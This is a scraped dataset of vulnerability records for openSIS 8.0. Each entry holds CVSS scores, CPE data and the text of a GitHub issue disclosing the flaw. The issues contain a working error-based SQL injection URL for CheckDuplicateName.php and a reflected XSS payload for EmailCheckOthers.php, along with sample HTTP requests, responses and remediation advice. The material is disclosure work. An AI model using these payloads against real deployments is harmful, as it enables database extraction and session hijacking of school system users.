{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 5, "confidentialityImpact": "PARTIAL", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/OS4ED/openSIS-Classic/issues/198" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/OS4ED/openSIS-Classic/issues/198" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:os4ed:opensis:8.0:*:*:*:*:*:*:*", "matchCriteriaId": "20B5286C-4CFF-4710-8D23-C76669FADFE7", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "89" ]
89
https://github.com/OS4ED/openSIS-Classic/issues/198
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "OS4ED", "openSIS-Classic" ]
### Description Due to lack of protection, parameters `table_name`, `field_name`, `id`, `field_id` can be abused to injection SQL queries to extract information from databases some other SQLi tricks, parameter `msg` can be used to inject XSS payload and steal user's cookie (and even takeover user's account) ![Screenshot from 2021-09-05 14-45-56(1)](https://user-images.githubusercontent.com/35491855/132119553-61eec465-0e9f-4276-bd86-aa278de2338d.jpg) As we can see, no security mechanism was implemented which resulted in a lot of vulnerabilities. ### Exploiting ![Screenshot from 2021-09-05 14-51-24](https://user-images.githubusercontent.com/35491855/132120089-1ba16847-7260-4872-ad53-c8d6c7c39901.jpg) **Injection point**: `HTTP://demo/CheckDuplicateName.php?table_name=api_info+where+id=1+and+extractvalue(0x0a,concat(0x0a,(select+database())))--&field_name=&val=&field_id=&msg=` In beneath, I've presented how information can be extracted via SQL injection. XSS can be exploited by giving the correct information in other parameters and inject Javascript code in `field_name`, `msg`. **Request:** <pre> GET /CheckDuplicateName.php?table_name=api_info+where+id=1+and+extractvalue(0x0a,concat(0x0a,(select+database())))--&field_name=&val=&field_id=&msg= HTTP/1.1 Host: demo.opensis.com User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:89.0) Gecko/20100101 Firefox/89.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: keep-alive Cookie: PHPSESSID=iadm2hjbvs4vqmskk07vcpp8n5; miniSidebar=0 Upgrade-Insecure-Requests: 1 </pre> **Response:** <pre> HTTP/1.1 200 OK Date: Sun, 05 Sep 2021 07:59:18 GMT Server: Apache/2.4.7 (Ubuntu) X-Powered-By: PHP/5.5.9-1ubuntu4.29 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 716 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/htmlx </pre> ### Solution Add security functions such as `sqlSecurityFilter` to sanitize parameters before processing or printing out to the screen. For XSS, use `htmlentities` to properly encode the output.
XSS and Error based SQL injection in CheckDuplicateName.php
https://api.github.com/repos/OS4ED/openSIS-Classic/issues/198/comments
4
2021-09-05T08:05:52Z
2022-03-05T02:40:45Z
https://github.com/OS4ED/openSIS-Classic/issues/198
988,449,754
198
3,278
CVE-2021-40637
2022-03-03T15:15:08.427
OS4ED openSIS 8.0 is affected by cross-site scripting (XSS) in EmailCheckOthers.php. An attacker can inject JavaScript code to get the user's cookie and take over the working session of user.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 6.1, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 2.7, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/OS4ED/openSIS-Classic/issues/199" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/OS4ED/openSIS-Classic/issues/199" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:os4ed:opensis:8.0:*:*:*:*:*:*:*", "matchCriteriaId": "20B5286C-4CFF-4710-8D23-C76669FADFE7", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "79" ]
79
https://github.com/OS4ED/openSIS-Classic/issues/199
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "OS4ED", "openSIS-Classic" ]
### Description By injecting Javascript code, an attacker can steal the user's cookie and take over the user's account. This happened because of the lack of security implementation for`type` parameter. This was tested on demo website ### Exploitation ![Screenshot from 2021-09-05 14-06-22](https://user-images.githubusercontent.com/35491855/132122706-da7fec3a-2b7b-433b-b059-a25f7cf604ae.jpg) **Injection point:** `HTTP://demo/EmailCheckOthers.php?opt=<script>alert(1)</script>&email=asfasf` **Request:** <pre> GET /EmailCheckOthers.php?opt=%3Cscript%3Ealert(1)%3C/script%3E&email=asfasf HTTP/1.1 Host: demo.opensis.com User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:89.0) Gecko/20100101 Firefox/89.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: keep-alive Cookie: PHPSESSID=iadm2hjbvs4vqmskk07vcpp8n5; miniSidebar=0 Upgrade-Insecure-Requests: 1 </pre> **Response:** <pre> HTTP/1.1 200 OK Date: Sun, 05 Sep 2021 09:57:28 GMT Server: Apache/2.4.7 (Ubuntu) X-Powered-By: PHP/5.5.9-1ubuntu4.29 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Length: 6 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html </pre> ### Solution: Before using any user's input, make sure to verify and sanitize it properly, trust nothing that's sent from the client. In the case of XSS, please consider using `htmlentities()` function to encode the user's input before printing it out to the user's screen
Reflected XSS in EmailCheckOthers.php
https://api.github.com/repos/OS4ED/openSIS-Classic/issues/199/comments
1
2021-09-05T10:01:03Z
2021-09-06T18:56:07Z
https://github.com/OS4ED/openSIS-Classic/issues/199
988,469,984
199
3,279